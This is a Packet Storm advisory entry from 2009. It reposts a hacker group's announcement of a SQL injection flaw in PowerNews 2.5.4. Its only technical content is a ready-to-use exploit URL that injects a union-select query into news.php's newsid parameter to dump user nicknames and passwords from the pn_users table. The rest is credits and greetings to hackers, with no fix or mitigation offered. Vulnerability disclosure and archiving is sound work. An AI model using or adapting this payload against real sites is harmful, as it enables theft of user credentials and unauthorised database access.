PowerNews 2.5.4 SQL Injection

2009-01-02T00:00:00
ID PACKETSTORM:73530
Type packetstorm
Reporter hadihadi
Modified 2009-01-02T00:00:00

Description

                                        
                                            ` #######################################################################################  
# #  
# ...:::::powernews 2.5.4 SQL Injection Vulnerability::::.... #   
#######################################################################################  
Virangar Security Team  
www.virangar.net  
--------  
Discoverd By :virangar security team(hadihadi)  
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007,Zahra  
& all virangar members & all hackerz  
greetz:to my best friend in the world hadi_aryaie2004  
& my lovely friend arash(imm02tal)  
-------  
exploit:  
http://site.com/news.php?newsid='/**/union/**/select/**/1,2,3,4,concat(nickname,0x3e,password),6,7,8,9/**/from/**/pn_users/*  
----  
young iranian h4ck3rz  
  
`